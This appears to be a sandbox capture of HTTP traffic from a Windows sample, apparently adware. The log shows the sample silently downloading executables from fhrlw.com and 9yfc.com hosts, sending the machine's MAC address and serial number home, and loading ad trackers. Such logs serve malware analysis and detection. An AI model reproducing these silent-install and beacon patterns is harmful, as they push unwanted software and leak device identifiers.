Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:48 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 9023c15c2b74fd70a034d1b373a42e09
Expires: Mon, 14 Jul 2014 01:04:57 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 01:04:57 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:10 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2048000-2252800
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 2048000-2252800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:06 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=409600-614400
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 409600-614400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:14 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:29 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=819200-1024000
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 819200-1024000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:53 GMT
<<< skipped >>>
GET /testgpimg/sogou_icon_short.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: image/png
Content-Length: 3528
Connection: keep-alive
Last-Modified: Wed, 23 Jan 2013 07:16:05 GMT
Expires: Sat, 14 Jun 2014 12:44:54 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1024000-1228800
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1024000-1228800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
<<
<<< skipped >>>
GET /slience/fhsli_6_12001.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: software.fhrlw.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 335364
Content-Type: application/octet-stream
Last-Modified: Wed, 28 May 2014 05:49:52 GMT
Accept-Ranges: bytes
ETag: "261b13a5387acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:31 GMT
<<
<<< skipped >>>
GET /cs/jsfile/js/c.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: images.sohu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Server: FSS
Date: Sat, 14 Jun 2014 08:25:51 GMT
Last-Modified: Mon, 26 May 2014 07:18:20 GMT
Expires: Sat, 14 Jun 2014 09:25:51 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip
FSS-Cache: HIT from 15041145.21594755.22842845
<<
<<< skipped >>>
GET /client/picchange.css HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 584
Content-Type: text/css
Last-Modified: Thu, 08 May 2014 04:11:16 GMT
Accept-Ranges: bytes
ETag: "fddeeb8e736acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fieldset, input, textarea, p, blockquote, th, td {.. margin: 0;.. padding: 0;..}..ol, ul {.. list-style: none outside none;..}...main{position: relative; width:340px;height: 60px;}...main div{width:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{display:block;}...showList{position:absolute;bottom:2px;right:0px;}...showList li{float:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-right:5px;font-size:0;}...showList li.special{background:#4384da;color:#4384da;}
<<
<<< skipped >>>
GET //js/picchange.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 908
Content-Type: application/x-javascript
Last-Modified: Thu, 08 May 2014 03:52:46 GMT
Accept-Ranges: bytes
ETag: "eeb3d4f8706acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:31 GMT
var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i ){...$('.showList li').eq(i).text(i 1);..}..function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);...$('.showList li').removeClass('special');...indexobj.toggleClass('special');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...obj.addClass('sel');......thisIndex = thisIndex 1>=bannerLength? 0 : thisIndex 1;..}.. ..$('.main .adlist').hover(function(){...window.clearInterval(timer);..},function(){...timer = window.setInterval( "ChangePic()" , 5000 );..})..$('.showList li').hover(function(){...window.clearInterval(timer);...thisIndex = parseInt(this.innerHTML) - 1;...ChangePic();..},function(){...timer = window.setInterval( "ChangePic()" , 5000 );..})....$(function(){... ...timer = window.setInterval( "ChangePic()" , 5000 );...ChangePic();..})
<<
<<< skipped >>>
GET /Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"errno":"1"}....
GET /ad/fixad.html?id=9995 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: client.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 14 Jun 2014 09:01:23 GMT
..<style type="text/css">.. body.. {.. margin: 0;.. border: 0;.. }..</style>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head><title>..</title><meta http-equiv="refresh" content="600" />.. <link href="hXXp://img.fhrlw.com/client/picchange.css".. rel="stylesheet" type="text/css" />.. .. <script src="hXXp://img.fhrlw.com/js/jquery-1.3.2.min.js".. type="text/javascript"></script>.. <script>.. window.onerror = function() { return true; };.. $(document).ready(function() {.. $(document).bind("contextmenu", function(e) {.. return false;.. });.. });.. </script>..</head>..<body scroll="no">.. <div class="main">.. <div class="adlist sel"><script type="text/javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.</script>.<script type=text/javascript src=hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div><div class="adlist "><script type="text/javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.</script>.<script type=text/javascript src=hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div><div class="adlist "><script type="text/javascript">.var sogou_ad_id=3412
<<
<<< skipped >>>
GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..
GET /pixel?tid=E0&ver=1&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=
Connection: Keep-Alive
Host: dspcm.brand.sogou.com
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
6..hello...0..
GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..
GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; YYID=
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />..0..
GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});....
GET /ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7434
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:44 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<
<<< skipped >>>
GET /xxdd_165.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ddl.9yfc.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.12
Date: Sat, 14 Jun 2014 08:56:32 GMT
Content-Type: application/octet-stream
Content-Length: 4409157
Last-Modified: Sat, 31 May 2014 06:56:10 GMT
Connection: keep-alive
Accept-Ranges: bytes
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=204800-409600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 204800-409600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:15 GMT
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=0-204800
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 0-204800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1843200-2048000
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1843200-2048000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:01 GMT
<<
<<< skipped >>>
GET /app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 042441fc49b4b85c9d202cbbd0c95096
Expires: Sun, 13 Jul 2014 16:07:20 GMT
Cache-Control: max-age=2592000
Last-Modified: Fri, 13 Jun 2014 16:07:20 GMT
<<
<<< skipped >>>
GET /Update/version.txt?45919992 HTTP/1.1
User-Agent: Update
Host: update.fhrlw.com
HTTP/1.1 200 OK
Content-Length: 72
Content-Type: .txt
Last-Modified: Fri, 13 Jun 2014 08:50:22 GMT
Accept-Ranges: bytes
ETag: "feb72083e486cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:21 GMT
[UpCfg]..Version=1.2.001..Force=1..KillClient=0..MsgTip=0..NoSlience=0....
GET /app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgstore04.cdn.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 81348f8f42f879e735d0529c30d31e6d
